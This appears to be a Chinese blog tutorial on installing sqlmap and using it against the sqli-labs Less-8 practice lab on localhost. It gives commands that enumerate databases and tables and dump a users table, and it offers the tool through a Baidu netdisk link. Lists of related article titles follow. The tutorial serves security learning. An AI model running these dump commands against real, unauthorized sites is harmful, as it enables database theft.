自动化SQL注入神器：

SQLMAP，功能时发现并利用指定的URL的SQL注入漏洞。支持的数据库：MySQL、Oracle、MSSQLserver、Access、DB2等

百度网盘

链接:https://pan.baidu.com/s/1xfQiWsFu17SEGcb4tB6jjw

提取码: 5yqd

SQLMAP的安装：

一、安装python环境

python-3.8.2-amd64

安装中选中：Add python3.8 to path，只有不用手动配置python的环境变量！选择自定义安装

点击next,这里可以修改储存路径，我是虚拟机，就扔C盘了

点击install

Win+r输入cmd进入命令框，输入python，安装成功

二、安装SQLMAP

重命名为sqlmap

三、生成SQLMAP快捷方式

桌面右键创建快捷方式

输入cmd

名称写为花花（最好写成SQLMAP，以免忘记，你也可以叫别的名字比如草草什么的)

在生成的SQLMAP下右键属性，修改起始位置为你储存sqlmap的起始位置，点击应用，确定

进来就是这样的

四、SQLMAP注入模式：

1.布尔盲注

2.时间盲注

3.报错注入

4.union联合注入

5.堆叠注入

SQLMAP的应用：(拿sqlilabs less8举例)

常用选项：

-u：指定url

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --dbms：指定数据库类型

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --dbms=mysql

--os：指定操作系统

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --os=linux

--proxy：指定代理

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --proxy 代理的url

--data：指定POST方式提交的数据

sqlmap.py -u  http://127.0.0.1:500/Less-8  --data=’id’=1

--flush-session ：刷新缓存

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --flush-session

--cookie=COOKIE：指定访问页面的cookies信息

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --cookie="PHPSESSID=a8d127e.."

五、SQLMAP的注入流程：

--dbs：列出所有的数据库名称

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1--dbs (列出所有数据库)

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db （列出当前数据库）

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db --dbms=mysql

-D ：指定数据库

-T：指定数据表

-C：指定列名称

--tables：列出指定数据库中的所有表

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security  --tables

--columns：列出指定库中的[指定表的]所有列

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -columns

--dump：列出指定库中的表中的数据

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -T users -dump

SQLMAP安装及使用教程相关推荐

1. 【无标题】【2023最新版】超详细Sqlmap安装保姆级教程，SQL注入使用指南，收藏这一篇就够了

   一.sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入.目前支持的数据库有MySql.Oracle.Access.PostageSQL. ...

2. linux下sqlmap安装教程,(转）Sqlmap官网下载与安装教程[windows/linux版本]

   转自:http://www.vuln.cn/2000 sqlmap的功能与强大性不必多言,方便大家下载,给大家整理了下sqlmap最新版的官网与github下载地址. 官网下载地址 github下载 ...

3. Termux 高级终端安装使用配置教程

   Termux 高级终端安装使用配置教程,这篇文章拖了有小半年.因为网上相关的文章相对来说还是比较少的,恰好今天又刷了机,所以就特意来总结一下,希望本文可以帮助到其他的小伙伴.发挥Android平台更大 ...

4. mysql数据库解压安装教程_MySQL数据库之windows 10下解压版MySql安装配置方法教程...

   本文主要向大家介绍了MySQL数据库之windows 10下解压版MySql安装配置方法教程 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助. windows 10 下安装解压版的 ...

5. codeblocks安装及使用教程（手把手傻瓜式教学）

   1.首先去codeblocks官网下载最新版codeblocks安装包. 2.双击下载的包,看到如下界面. 3.点击next,进行下一步. 4.点击I agree. 5.点击next,进行下一步. 6 ...

6. linux_OEL5.4_安装Oracle11g中文教程图解

   一.安装ORACLE10g 软件(11.2.0.0) 参考pdf:链接:http://pan.baidu.com/s/1pLHU94J 密码:keo8 (一)安装前的包支持 1. 虚拟机yum 环境搭 ...

7. 安装phpMyAdmin图文教程

   phpmyadmin的安装配置已经是老生常谈的话题了,网络上到处都可以找到相关的配置教程.但是,那些大多都是手动配置的,稍不留神,容易出错.因此站长今天在这里介绍的是,被很多phpmyadmin用户所 ...

8. mysql超详细教程_MySQL8.0.23安装超详细教程

   前言 最近在做一个人脸识别的项目,需要用数据库保存学生信息与前段交互. MySQL的优点 1.mysql性能卓越,服务稳定,很少出现异常宕机. 2.mysql开放源代码且无版权制约,自主性及使用成本低 ...

9. TensorRT安装及使用教程

   常见网络tensorrt c++版实现: https://github.com/wang-xinyu/tensorrtx 参考:TensorRT安装及使用教程_ZONGXP的博客-CSDN博客_ten ...

10. 六丶青龙的依赖库+拉库+互助安装及使用教程

    六丶青龙的依赖库+互助安装及使用教程 没有服务器的先自行购买,这里推荐腾讯云2H4G8M首年70–点击购买 青龙面板安装教程 QQ交流:1014549449 --------------点击跳转 青龙 ...

最新文章

1. C++中的new和malloc的区别
2. 快速傅立叶变换(FFT)算法(原来这就是蝶形变换)
3. Week 1 Team Homework #3 from Z.XML-软件工程在北航
4. windows查看进程
5. Android 如何在Eclipse中查看Android API源码 及 support包源码
6. lisp 所在图幅号计算_图幅编号的计算
7. 从头开始学JavaScript (九)——执行环境和作用域
8. 根据一览，自动生成Sheet页
9. XML文件解析 --------------------笔记
10. mongodb 非 admin 库 认证登陆失败 原因（百度好多都 是渣）db.addUser() 请走开。
11. matlab中的线性规划
12. Python解压zip和rar文件
13. pyinstaller包含html文件,pyinstaller打包exe
14. ssh和rsh的区别、Linux rsh命令
15. 计算机应用大赛动员大会,计算机应用工程系第十二届学生会动员大会
16. 2016大学计算机陈春丽,2016级计算机类专业分流结果公示.PDF
17. 总结VUE控制滚动滑动方法
18. 中华女子学院计算机考试题库,中华女子学院综合素质测试面试题历年总结
19. Jenkins系列之——前言 Jenkins初识
20. LDAP unexpected response: 500

热门文章

1. three.js视频教程2022最新
2. HBase基本操作:JAVA API操作
3. 2022年电工杯B题参赛历程
4. .NET网络编程学习(三)--网络蜘蛛程序(Spider)
5. 数据科学家的职业发展前景如何？主要有哪些选择？
6. Hadoop 入门教程（超详细）
7. web前端大作业：游戏动漫网页设计（HTML+CSS+JavaScript）
8. SQL SERVER 备份数据库sql语句
9. 做电话营销，如何避免成为骚扰电话
10. 通信系统是如何收发复数信号的：IQ 调制原理